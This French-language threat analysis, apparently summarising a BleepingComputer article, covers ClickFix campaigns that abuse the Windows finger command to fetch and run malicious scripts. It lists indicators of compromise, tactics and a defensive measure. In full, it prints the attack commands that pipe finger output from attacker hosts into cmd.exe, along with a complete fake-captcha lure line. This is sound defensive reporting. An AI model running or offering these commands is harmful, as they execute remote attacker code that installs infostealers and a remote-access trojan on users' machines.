Source: BleepingComputer (Lawrence Abrams). L’article décrit des campagnes récentes où la vieille commande finger est abusée comme LOLBIN pour livrer et exécuter des scripts malveillants sur Windows, souvent via des attaques ClickFix se faisant passer pour des Captcha.

Les attaquants incitent l’utilisateur à lancer une commande Windows qui exécute finger user@hôte et redirige la sortie vers cmd.exe, ce qui permet d’exécuter à distance les instructions renvoyées par un serveur Finger. Des échantillons et rapports (VirusTotal, Reddit, MalwareHunterTeam) montrent l’usage de hôtes Finger malveillants.

Dans un cas, la commande finger vke@finger.cloudmega[.]org | cmd crée un chemin aléatoire, copie et renomme curl.exe, télécharge une archive ZIP déguisée en PDF depuis cloudmega[.]org, extrait un paquet Python, puis l’exécute via pythonw.exe init.py. Un appel de confirmation vers le serveur de l’attaquant est effectué pendant qu’un faux prompt « Verify you are human » s’affiche. Un batch connexe suggère qu’il s’agit d’un infostealer. 🧪

Une autre campagne (finger Kove2@api.metrics-strange.com | cmd) est plus évasive: elle recherche des outils d’analyse (Procmon, Wireshark, x64dbg, etc.) et quitte si elle en trouve. Sinon, elle télécharge une archive (faussement en PDF), en extrait NetSupport Manager RAT, puis crée une tâche planifiée pour la persistance au logon. 🐀

Pour la défense, l’article note que bloquer le trafic sortant TCP 79 empêche l’usage du protocole Finger par ces campagnes. Cet article est une analyse de menace visant à informer sur la technique, les chaînes d’exécution et les IOCs observés.

• IOCs

  • Serveurs/Domaines: finger.nateams[.]com, finger.cloudmega[.]org, api.metrics-strange.com, cloudmega[.]org
  • Commandes observées:
    • finger root@finger.nateams[.]com
    • finger vke@finger.cloudmega[.]org | cmd
    • finger Kove2@api.metrics-strange.com | cmd
    • Exemple d’incitation utilisateur: cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are human--press ENTER'

• TTPs

  • Ingénierie sociale ClickFix via faux Captcha (« Win + R » puis commande)
  • Abus de LOLBIN: finger pour récupérer des commandes et les exécuter via cmd.exe
  • Téléchargement avec curl.exe renommé; archives ZIP déguisées en PDF
  • Exécution d’un paquet Python via pythonw.exe init.py
  • Anti-analyse: détection d’outils (filemon, regmon, procexp/procexp64, tcpview/tcpview64, Procmon/Procmon64, vmmap/vmmap64, portmon, processlasso, Wireshark, Fiddler, Everywhere, ida/ida64, ImmunityDebugger, WinDump, x64dbg/x32dbg, OllyDbg, ProcessHacker)
  • Déploiement RAT: NetSupport Manager RAT
  • Persistance: tâche planifiée au logon
  • Callback vers le serveur de l’attaquant

🧠 TTPs et IOCs détectés

TTPs

[‘Ingénierie sociale ClickFix via faux Captcha’, ‘Abus de LOLBIN: finger pour récupérer des commandes et les exécuter via cmd.exe’, ‘Téléchargement avec curl.exe renommé; archives ZIP déguisées en PDF’, ‘Exécution d’un paquet Python via pythonw.exe init.py’, “Anti-analyse: détection d’outils d’analyse”, ‘Déploiement RAT: NetSupport Manager RAT’, ‘Persistance: tâche planifiée au logon’, ‘Callback vers le serveur de l’attaquant’]

IOCs

[‘finger.nateams[.]com’, ‘finger.cloudmega[.]org’, ‘api.metrics-strange.com’, ‘cloudmega[.]org’, ‘finger root@finger.nateams[.]com’, ‘finger vke@finger.cloudmega[.]org | cmd’, ‘finger Kove2@api.metrics-strange.com | cmd’]

🔗 Source originale : https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/